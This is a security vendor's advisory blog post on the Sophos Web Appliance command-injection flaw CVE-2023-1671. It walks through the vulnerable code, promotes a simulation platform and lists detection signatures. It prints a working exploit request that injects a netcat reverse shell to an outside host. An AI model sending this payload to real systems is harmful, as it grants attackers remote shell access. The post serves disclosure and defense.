CVE-2023-1671: Sophos Command Injection Vulnerability Exploited in the Wild

Effective Threat Exposure Management

Understand the 4 trade-offs that limit modern security teams to properly manage their organization’s threat exposure.

DOWNLOAD BLUE REPORT

On November 16, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) added Sophos Web Appliance CVE-2023-1671 Command Injection vulnerability into the Known Exploited Vulnerabilities (KEV) catalog [1]. Although it was disclosed in April 2023, CVE-2023-1671 is actively being exploited in the wild. CVE-2023-1671 vulnerability has a CVSS score of a CVSS score of 9.8 (Critical).

In this blog, we explained the Sophos CVE-2023-1671 vulnerability and how organizations can defend against the CVE-2023-1671 exploitation attacks.

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Sophos Web Appliance CVE-2023-1671 Explained

Sophos Web Appliance (SWA) is used by organizations to filter incoming web traffic to protect against web-based threats. It is often used for content filtering, threat protection, and data loss prevention (DLP). Sophos Web Appliance is placed at the network perimeter or specified network segments where web traffic can be analyzed and filtered.

In April 2023, Sophos disclosed a pre-auth command injection vulnerability affecting Sophos Web Appliance. This vulnerability allows adversaries to execute arbitrary commands and does not require authentication. CVE-2023-1671 affects Sophos Web Appliance prior to version 4.3.10.4. SWA receives updates automatically by default, and Sophos released a fix at the time of disclosure. Although SWA has an auto-update feature and the product became End-of-Life on July 20, 2023, adversaries are still exploiting vulnerable SWA in the wild. Organizations are advised to fix their vulnerable SWA and keep the device behind a firewall, making it inaccessible via the public internet.

How Sophos Web Appliance CVE-2023-1671 Exploit Works?

Sophos CVE-2023-1671 vulnerability stems from a vulnerable component named warn-proceed handler. The weakness is classified as CWE-77 and allows adversaries to manipulate input for pre-authenticated command injection. User inputs sent through "/index.php?c=blocked" using an HTTP POST request are routed to UsrBlocked.php and processed by escapeshellarg function [2].

if($_GET['action'] == 'continue') {
if(strlen(trim($_POST['user'])) > 0)
$user = base64_decode($_POST['user_encoded']);
else
$user = $_POST['client-ip'];
if($user == '-') $user = $_POST['client-ip'];
$user = escapeshellarg($user);
if($_POST['args_reason'] == 'filetypewarn') {
$key = $_POST['url'];
$packer = '/opt/ws/bin/ftsblistpack';
$value = $_POST['filetype'];
}
else {
$key = $_POST['domain'];
$packer = '/opt/ws/bin/sblistpack';
$catParts = explode("|",$_POST['raw_category_id']);
$value = $catParts[0];
}

$key = escapeshellarg($key);
$value = escapeshellarg($value);
$this->log->write("DEBUG","cmd = '$packer $key $user $value'");
$result = shell_exec("$packer $key $user $value 2>&1");

Code section where UsrBlocked.php handles user inputs

When an attacker sends a base-64 encoded command via a POST request, it is injected into ftsblistpack. Since the input is wrapped in single quotes, attackers can manipulate the input and execute commands remotely.

open my $flag, ">", "$flag_file_dir/$proceeded_flag_file" or die "Open file [$flag_file_dir/$proceeded_flag_file] failed" and $rc++;
close($flag);

$rc += system("$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'");
}
exit $rc;

The system function in the ftsblistpack Perl script before the patch

An example payload is given below. It executes a reverse shell connection to the test machine.

— Base-64 encoded

POST /index.php?c=blocked&action=continue HTTP/1.1
args_reason=filetypewarn&url=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&filetype=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user_encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguMS40MiA0NDQ0ICM=

— Base-64 decoded


POST /index.php?c=blocked&action=continue HTTP/1.1
args_reason=filetypewarn&url=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&filetype=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user_encoded=';nc -e /bin/sh 192.168.1.42 4444 #

How Picus Helps Simulate Sophos CVE-2023-1671 Attacks?

We also strongly suggest simulating the Sophos CVE-2023-1671 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, Looney Tunables, and ProxyShell, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Sophos CVE-2023-1671 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

34756

Sophos Web Appliance Web Attack Campaign

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Sophos CVE-2023-1671 vulnerability and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Sophos CVE-2023-1671 vulnerability:

Security Control

Signature ID

Signature Name

Checkpoint NGFW

asm_dynamic_prop_CVE_2023_1671

Sophos Web Appliance Command Injection (CVE-2023-1671)

Cisco FirePower

1.61794.1

SERVER-WEBAPP Sophos Virtual Web Appliance unauthenticated command injection attempt

Fortigate IPS

52919

web_app3: Sophos.Web.Appliance.warn-proceed.Command.Injection

Imperva SecureSphere

 

CVE-2023-1671: Sophos Web Appliance Pre-Auth RCE

McAfee

0x452e5000

HTTP: Sophos Web-Appliance Pre-Authentication Command Injection Vulnerability (CVE-2023-1671)

Palo Alto

93746

Sophos Web Appliance Command Injection Vulnerability

Snort

1.61794.1

SERVER-WEBAPP Sophos Virtual Web Appliance unauthenticated command injection attempt

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof the Picus Complete Security Validation Platform.

References

[1] "CISA Adds Three Known Exploited Vulnerabilities to Catalog," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2023/11/16/cisa-adds-three-known-exploited-vulnerabilities-catalog. [Accessed: Nov. 22, 2023]

[2] "Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog," VulnCheck. Available: https://vulncheck.com/blog/cve-2023-1671-analysis. [Accessed: Nov. 22, 2023]